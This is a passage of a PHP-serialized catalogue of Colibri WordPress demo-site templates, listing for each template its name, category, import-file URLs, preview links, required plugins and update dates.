PRO\";s:4:\"slug\";s:12:\"handyman-pro\";s:10:\"categories\";a:1:{i:0;s:8:\"services\";}s:15:\"import_file_url\";s:89:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/handyman-pro/content.xml\";s:22:\"import_widget_file_url\";s:89:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/handyman-pro/widgets.wie\";s:26:\"import_customizer_file_url\";s:92:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/handyman-pro/customizer.dat\";s:24:\"import_preview_image_url\";s:78:\"https://static.colibriwp.com/templates-screenshots/handyman-pro/screenshot.jpg\";s:11:\"preview_url\";s:49:\"https://colibriwp-work.colibriwp.com/handyman-pro\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2020-06-02 13:37:45.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:63;a:11:{s:16:\"import_file_name\";s:13:\"Home Deco PRO\";s:4:\"slug\";s:13:\"home-deco-pro\";s:10:\"categories\";a:1:{i:0;s:8:\"business\";}s:15:\"import_file_url\";s:90:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/home-deco-pro/content.xml\";s:22:\"import_widget_file_url\";s:90:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/home-deco-pro/widgets.wie\";s:26:\"import_customizer_file_url\";s:93:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/home-deco-pro/customizer.dat\";s:24:\"import_preview_image_url\";s:79:\"https://static.colibriwp.com/templates-screenshots/home-deco-pro/screenshot.jpg\";s:11:\"preview_url\";s:50:\"https://colibriwp-work.colibriwp.com/home-deco-pro\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2020-06-02 13:37:44.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:64;a:11:{s:16:\"import_file_name\";s:12:\"Coaching PRO\";s:4:\"slug\";s:14:\"coaching-pro-1\";s:10:\"categories\";a:1:{i:0;s:9:\"portfolio\";}s:15:\"import_file_url\";s:91:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/coaching-pro-1/content.xml\";s:22:\"import_widget_file_url\";s:91:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/coaching-pro-1/widgets.wie\";s:26:\"import_customizer_file_url\";s:94:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/coaching-pro-1/customizer.dat\";s:24:\"import_preview_image_url\";s:80:\"https://static.colibriwp.com/templates-screenshots/coaching-pro-1/screenshot.jpg\";s:11:\"preview_url\";s:51:\"https://colibriwp-work.colibriwp.com/coaching-pro-1\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2020-06-02 13:37:42.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:65;a:11:{s:16:\"import_file_name\";s:13:\"Coaching Free\";s:4:\"slug\";s:15:\"coaching-free-1\";s:10:\"categories\";a:1:{i:0;s:9:\"portfolio\";}s:15:\"import_file_url\";s:92:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/coaching-free-1/content.xml\";s:22:\"import_widget_file_url\";s:92:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/coaching-free-1/widgets.wie\";s:26:\"import_customizer_file_url\";s:95:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/coaching-free-1/customizer.dat\";s:24:\"import_preview_image_url\";s:81:\"https://static.colibriwp.com/templates-screenshots/coaching-free-1/screenshot.jpg\";s:11:\"preview_url\";s:50:\"https://colibriwp-work.colibriwp.com/coaching-free\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2020-09-14 08:01:48.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:0;}i:66;a:11:{s:16:\"import_file_name\";s:14:\"Designer Ui/Ux\";s:4:\"slug\";s:13:\"designer-uiux\";s:10:\"categories\";a:1:{i:0;s:9:\"portfolio\";}s:15:\"import_file_url\";s:90:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/designer-uiux/content.xml\";s:22:\"import_widget_file_url\";s:90:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/designer-uiux/widgets.wie\";s:26:\"import_customizer_file_url\";s:93:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/designer-uiux/customizer.dat\";s:24:\"import_preview_image_url\";s:79:\"https://static.colibriwp.com/templates-screenshots/designer-uiux/screenshot.jpg\";s:11:\"preview_url\";s:50:\"https://colibriwp-work.colibriwp.com/designer-uiux\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2020-09-25 08:33:19.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:67;a:11:{s:16:\"import_file_name\";s:9:\"Insurance\";s:4:\"slug\";s:11:\"insurance-1\";s:10:\"categories\";a:1:{i:0;s:8:\"services\";}s:15:\"import_file_url\";s:88:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/insurance-1/content.xml\";s:22:\"import_widget_file_url\";s:88:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/insurance-1/widgets.wie\";s:26:\"import_customizer_file_url\";s:91:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/insurance-1/customizer.dat\";s:24:\"import_preview_image_url\";s:77:\"https://static.colibriwp.com/templates-screenshots/insurance-1/screenshot.jpg\";s:11:\"preview_url\";s:46:\"https://colibriwp-work.colibriwp.com/insurance\";s:7:\"plugins\";a:2:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";s:37:\"mailchimp-for-wp/mailchimp-for-wp.php\";s:30:\"MC4WP: Mailchimp for WordPress\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2021-01-04 10:02:55.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:68;a:11:{s:16:\"import_file_name\";s:10:\"Veterinary\";s:4:\"slug\";s:12:\"veterinary-1\";s:10:\"categories\";a:1:{i:0;s:8:\"services\";}s:15:\"import_file_url\";s:89:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/veterinary-1/content.xml\";s:22:\"import_widget_file_url\";s:89:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/veterinary-1/widgets.wie\";s:26:\"import_customizer_file_url\";s:92:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/veterinary-1/customizer.dat\";s:24:\"import_preview_image_url\";s:78:\"https://static.colibriwp.com/templates-screenshots/veterinary-1/screenshot.jpg\";s:11:\"preview_url\";s:47:\"https://colibriwp-work.colibriwp.com/veterinary\";s:7:\"plugins\";a:2:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";s:37:\"mailchimp-for-wp/mailchimp-for-wp.php\";s:30:\"MC4WP: Mailchimp for WordPress\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2021-01-19 15:56:02.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:69;a:11:{s:16:\"import_file_name\";s:8:\"Handmade\";s:4:\"slug\";s:10:\"handmade-1\";s:10:\"categories\";a:1:{i:0;s:9:\"portfolio\";}s:15:\"import_file_url\";s:87:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/handmade-1/content.xml\";s:22:\"import_widget_file_url\";s:87:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/handmade-1/widgets.wie\";s:26:\"import_customizer_file_url\";s:90:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/handmade-1/customizer.dat\";s:24:\"import_preview_image_url\";s:76:\"https://static.colibriwp.com/templates-screenshots/handmade-1/screenshot.jpg\";s:11:\"preview_url\";s:45:\"https://colibriwp-work.colibriwp.com/handmade\";s:7:\"plugins\";a:2:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";s:37:\"mailchimp-for-wp/mailchimp-for-wp.php\";s:30:\"MC4WP: Mailchimp for WordPress\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2021-02-09 09:36:12.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:70;a:11:{s:16:\"import_file_name\";s:20:\"Aesthetic clinic PRO\";s:4:\"slug\";s:22:\"aesthetic-clinic-pro-1\";s:10:\"categories\";a:1:{i:0;s:8:\"services\";}s:15:\"import_file_url\";s:99:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/aesthetic-clinic-pro-1/content.xml\";s:22:\"import_widget_file_url\";s:99:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/aesthetic-clinic-pro-1/widgets.wie\";s:26:\"import_customizer_file_url\";s:102:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/aesthetic-clinic-pro-1/customizer.dat\";s:24:\"import_preview_image_url\";s:88:\"https://static.colibriwp.com/templates-screenshots/aesthetic-clinic-pro-1/screenshot.jpg\";s:11:\"preview_url\";s:59:\"https://colibriwp-work.colibriwp.com/aesthetic-clinic-pro-1\";s:7:\"plugins\";a:2:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";s:37:\"mailchimp-for-wp/mailchimp-for-wp.php\";s:30:\"MC4WP: Mailchimp for WordPress\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2021-01-19 15:56:00.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:71;a:11:{s:16:\"import_file_name\";s:10:\"Tattoo PRO\";s:4:\"slug\";s:10:\"tattoo-pro\";s:10:\"categories\";a:1:{i:0;s:8:\"business\";}s:15:\"import_file_url\";s:87:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/tattoo-pro/content.xml\";s:22:\"import_widget_file_url\";s:87:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/tattoo-pro/widgets.wie\";s:26:\"import_customizer_file_url\";s:90:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/tattoo-pro/customizer.dat\";s:24:\"import_preview_image_url\";s:76:\"https://static.colibriwp.com/templates-screenshots/tattoo-pro/screenshot.jpg\";s:11:\"preview_url\";s:47:\"https://colibriwp-work.colibriwp.com/tattoo-pro\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2021-01-19 15:54:51.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:72;a:11:{s:16:\"import_file_name\";s:14:\"Accounting PRO\";s:4:\"slug\";s:16:\"accounting-pro-1\";s:10:\"categories\";a:1:{i:0;s:8:\"business\";}s:15:\"import_file_url\";s:93:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/accounting-pro-1/content.xml\";s:22:\"import_widget_file_url\";s:93:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/accounting-pro-1/widgets.wie\";s:26:\"import_customizer_file_url\";s:96:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/accounting-pro-1/customizer.dat\";s:24:\"import_preview_image_url\";s:82:\"https://static.colibriwp.com/templates-screenshots/accounting-pro-1/screenshot.jpg\";s:11:\"preview_url\";s:51:\"https://colibriwp-work.colibriwp.com/accounting-pro\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2020-11-06 07:32:11.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:73;a:11:{s:16:\"import_file_name\";s:14:\"Web Agency PRO\";s:4:\"slug\";s:14:\"web-agency-pro\";s:10:\"categories\";a:1:{i:0;s:8:\"business\";}s:15:\"import_file_url\";s:91:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/web-agency-pro/content.xml\";s:22:\"import_widget_file_url\";s:91:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/web-agency-pro/widgets.wie\";s:26:\"import_customizer_file_url\";s:94:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/web-agency-pro/customizer.dat\";s:24:\"import_preview_image_url\";s:80:\"https://static.colibriwp.com/templates-screenshots/web-agency-pro/screenshot.jpg\";s:11:\"preview_url\";s:51:\"https://colibriwp-work.colibriwp.com/web-agency-pro\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2020-10-30 09:48:41.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:74;a:11:{s:16:\"import_file_name\";s:13:\"Eldercare PRO\";s:4:\"slug\";s:13:\"eldercare-pro\";s:10:\"categories\";a:1:{i:0;s:9:\"community\";}s:15:\"import_file_url\";s:90:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/eldercare-pro/content.xml\";s:22:\"import_widget_file_url\";s:90:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/eldercare-pro/widgets.wie\";s:26:\"import_customizer_file_url\";s:93:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/eldercare-pro/customizer.dat\";s:24:\"import_preview_image_url\";s:79:\"https://static.colibriwp.com/templates-screenshots/eldercare-pro/screenshot.jpg\";s:11:\"preview_url\";s:50:\"https://colibriwp-work.colibriwp.com/eldercare-pro\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2021-01-19 15:54:49.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:75;a:11:{s:16:\"import_file_name\";s:20:\"Personal Stylist PRO\";s:4:\"slug\";s:20:\"personal-stylist-pro\";s:10:\"categories\";a:1:{i:0;s:8:\"business\";}s:15:\"import_file_url\";s:97:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/personal-stylist-pro/content.xml\";s:22:\"import_widget_file_url\";s:97:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/personal-stylist-pro/widgets.wie\";s:26:\"import_customizer_file_url\";s:100:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/personal-stylist-pro/customizer.dat\";s:24:\"import_preview_image_url\";s:86:\"https://static.colibriwp.com/templates-screenshots/personal-stylist-pro/screenshot.jpg\";s:11:\"preview_url\";s:57:\"https://colibriwp-work.colibriwp.com/personal-stylist-pro\";s:7:\"plugins\";a:2:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";s:37:\"mailchimp-for-wp/mailchimp-for-wp.php\";s:30:\"MC4WP: Mailchimp for WordPress\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2020-09-24 13:40:49.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:76;a:11:{s:16:\"import_file_name\";s:15:\"Illusionist PRO\";s:4:\"slug\";s:15:\"illusionist-pro\";s:10:\"categories\";a:1:{i:0;s:8:\"business\";}s:15:\"import_file_url\";s:92:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/illusionist-pro/content.xml\";s:22:\"import_widget_file_url\";s:92:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/illusionist-pro/widgets.wie\";s:26:\"import_customizer_file_url\";s:95:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/illusionist-pro/customizer.dat\";s:24:\"import_preview_image_url\";s:81:\"https://static.colibriwp.com/templates-screenshots/illusionist-pro/screenshot.jpg\";s:11:\"preview_url\";s:52:\"https://colibriwp-work.colibriwp.com/illusionist-pro\";s:7:\"plugins\";a:2:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";s:37:\"mailchimp-for-wp/mailchimp-for-wp.php\";s:30:\"MC4WP: Mailchimp for WordPress\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2021-01-19 15:54:46.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:77;a:11:{s:16:\"import_file_name\";s:13:\"Paintball PRO\";s:4:\"slug\";s:13:\"paintball-pro\";s:10:\"categories\";a:1:{i:0;s:12:\"sport-travel\";}s:15:\"import_file_url\";s:90:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/paintball-pro/content.xml\";s:22:\"import_widget_file_url\";s:90:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/paintball-pro/widgets.wie\";s:26:\"import_customizer_file_url\";s:93:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/paintball-pro/customizer.dat\";s:24:\"import_preview_image_url\";s:79:\"https://static.colibriwp.com/templates-screenshots/paintball-pro/screenshot.jpg\";s:11:\"preview_url\";s:50:\"https://colibriwp-work.colibriwp.com/paintball-pro\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2021-01-19 15:54:44.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:78;a:11:{s:16:\"import_file_name\";s:11:\"Painter PRO\";s:4:\"slug\";s:11:\"painter-pro\";s:10:\"categories\";a:1:{i:0;s:9:\"portfolio\";}s:15:\"import_file_url\";s:88:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/painter-pro/content.xml\";s:22:\"import_widget_file_url\";s:88:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/painter-pro/widgets.wie\";s:26:\"import_customizer_file_url\";s:91:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/painter-pro/customizer.dat\";s:24:\"import_preview_image_url\";s:77:\"https://static.colibriwp.com/templates-screenshots/painter-pro/screenshot.jpg\";s:11:\"preview_url\";s:48:\"https://colibriwp-work.colibriwp.com/painter-pro\";s:7:\"plugins\";a:2:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";s:37:\"mailchimp-for-wp/mailchimp-for-wp.php\";s:30:\"MC4WP: Mailchimp for WordPress\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2020-10-19 08:06:59.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:79;a:11:{s:16:\"import_file_name\";s:12:\"Football PRO\";s:4:\"slug\";s:12:\"football-pro\";s:10:\"categories\";a:1:{i:0;s:12:\"sport-travel\";}s:15:\"import_file_url\";s:89:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/football-pro/content.xml\";s:22:\"import_widget_file_url\";s:89:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/football-pro/widgets.wie\";s:26:\"import_customizer_file_url\";s:92:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/football-pro/customizer.dat\";s:24:\"import_preview_image_url\";s:78:\"https://static.colibriwp.com/templates-screenshots/template-122/screenshot.jpg\";s:11:\"preview_url\";s:49:\"https://colibriwp-work.colibriwp.com/football-pro\";s:7:\"plugins\";a:2:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";s:37:\"mailchimp-for-wp/mailchimp-for-wp.php\";s:30:\"MC4WP: Mailchimp for WordPress\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2021-01-19 15:54:42.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:80;a:11:{s:16:\"import_file_name\";s:12:\"Swimming PRO\";s:4:\"slug\";s:12:\"swimming-pro\";s:10:\"categories\";a:1:{i:0;s:12:\"sport-travel\";}s:15:\"import_file_url\";s:89:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/swimming-pro/content.xml\";s:22:\"import_widget_file_url\";s:89:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/swimming-pro/widgets.wie\";s:26:\"import_customizer_file_url\";s:92:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/swimming-pro/customizer.dat\";s:24:\"import_preview_image_url\";s:78:\"https://static.colibriwp.com/templates-screenshots/swimming-pro/screenshot.jpg\";s:11:\"preview_url\";s:49:\"https://colibriwp-work.colibriwp.com/swimming-pro\";s:7:\"plugins\";a:2:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";s:37:\"mailchimp-for-wp/mailchimp-for-wp.php\";s:30:\"MC4WP: Mailchimp for WordPress\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2021-01-19 15:54:40.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:81;a:11:{s:16:\"import_file_name\";s:16:\"Pest control PRO\";s:4:\"slug\";s:16:\"pest-control-pro\";s:10:\"categories\";a:1:{i:0;s:8:\"services\";}s:15:\"import_file_url\";s:93:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/pest-control-pro/content.xml\";s:22:\"import_widget_file_url\";s:93:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/pest-control-pro/widgets.wie\";s:26:\"import_customizer_file_url\";s:96:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/pest-control-pro/customizer.dat\";s:24:\"import_preview_image_url\";s:82:\"https://static.colibriwp.com/templates-screenshots/pest-control-pro/screenshot.jpg\";s:11:\"preview_url\";s:53:\"https://colibriwp-work.colibriwp.com/pest-control-pro\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2021-01-19 15:54:37.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:82;a:11:{s:16:\"import_file_name\";s:19:\"Coworking Space PRO\";s:4:\"slug\";s:19:\"coworking-space-pro\";s:10:\"categories\";a:1:{i:0;s:8:\"business\";}s:15:\"import_file_url\";s:96:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/coworking-space-pro/content.xml\";s:22:\"import_widget_file_url\";s:96:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/coworking-space-pro/widgets.wie\";s:26:\"import_customizer_file_url\";s:99:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/coworking-space-pro/customizer.dat\";s:24:\"import_preview_image_url\";s:85:\"https://static.colibriwp.com/templates-screenshots/coworking-space-pro/screenshot.jpg\";s:11:\"preview_url\";s:56:\"https://colibriwp-work.colibriwp.com/coworking-space-pro\";s:7:\"plugins\";a:2:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";s:37:\"mailchimp-for-wp/mailchimp-for-wp.php\";s:30:\"MC4WP: Mailchimp for WordPress\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2020-10-21 11:27:45.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:83;a:11:{s:16:\"import_file_name\";s:9:\"Print PRO\";s:4:\"slug\";s:9:\"print-pro\";s:10:\"categories\";a:1:{i:0;s:8:\"services\";}s:15:\"import_file_url\";s:86:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/print-pro/content.xml\";s:22:\"import_widget_file_url\";s:86:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/print-pro/widgets.wie\";s:26:\"import_customizer_file_url\";s:89:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/print-pro/customizer.dat\";s:24:\"import_preview_image_url\";s:75:\"https://static.colibriwp.com/templates-screenshots/print-pro/screenshot.jpg\";s:11:\"preview_url\";s:46:\"https://colibriwp-work.colibriwp.com/print-pro\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2020-09-25 08:38:43.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:84;a:11:{s:16:\"import_file_name\";s:14:\"Accountant PRO\";s:4:\"slug\";s:14:\"accountant-pro\";s:10:\"categories\";a:1:{i:0;s:8:\"services\";}s:15:\"import_file_url\";s:91:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/accountant-pro/content.xml\";s:22:\"import_widget_file_url\";s:91:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/accountant-pro/widgets.wie\";s:26:\"import_customizer_file_url\";s:94:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/accountant-pro/customizer.dat\";s:24:\"import_preview_image_url\";s:80:\"https://static.colibriwp.com/templates-screenshots/accountant-pro/screenshot.jpg\";s:11:\"preview_url\";s:51:\"https://colibriwp-work.colibriwp.com/accountant-pro\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2020-11-19 08:49:32.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:85;a:11:{s:16:\"import_file_name\";s:22:\"Marketing services PRO\";s:4:\"slug\";s:22:\"marketing-services-pro\";s:10:\"categories\";a:1:{i:0;s:8:\"business\";}s:15:\"import_file_url\";s:99:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/marketing-services-pro/content.xml\";s:22:\"import_widget_file_url\";s:99:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/marketing-services-pro/widgets.wie\";s:26:\"import_customizer_file_url\";s:102:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/marketing-services-pro/customizer.dat\";s:24:\"import_preview_image_url\";s:88:\"https://static.colibriwp.com/templates-screenshots/marketing-services-pro/screenshot.jpg\";s:11:\"preview_url\";s:59:\"https://colibriwp-work.colibriwp.com/marketing-services-pro\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2020-09-25 08:09:48.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:86;a:11:{s:16:\"import_file_name\";s:17:\"Web Developer PRO\";s:4:\"slug\";s:17:\"web-developer-pro\";s:10:\"categories\";a:1:{i:0;s:9:\"portfolio\";}s:15:\"import_file_url\";s:94:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/web-developer-pro/content.xml\";s:22:\"import_widget_file_url\";s:94:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/web-developer-pro/widgets.wie\";s:26:\"import_customizer_file_url\";s:97:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/web-developer-pro/customizer.dat\";s:24:\"import_preview_image_url\";s:83:\"https://static.colibriwp.com/templates-screenshots/web-developer-pro/screenshot.jpg\";s:11:\"preview_url\";s:54:\"https://colibriwp-work.colibriwp.com/web-developer-pro\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2020-12-15 06:17:47.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:87;a:11:{s:16:\"import_file_name\";s:24:\"Full Stack Developer 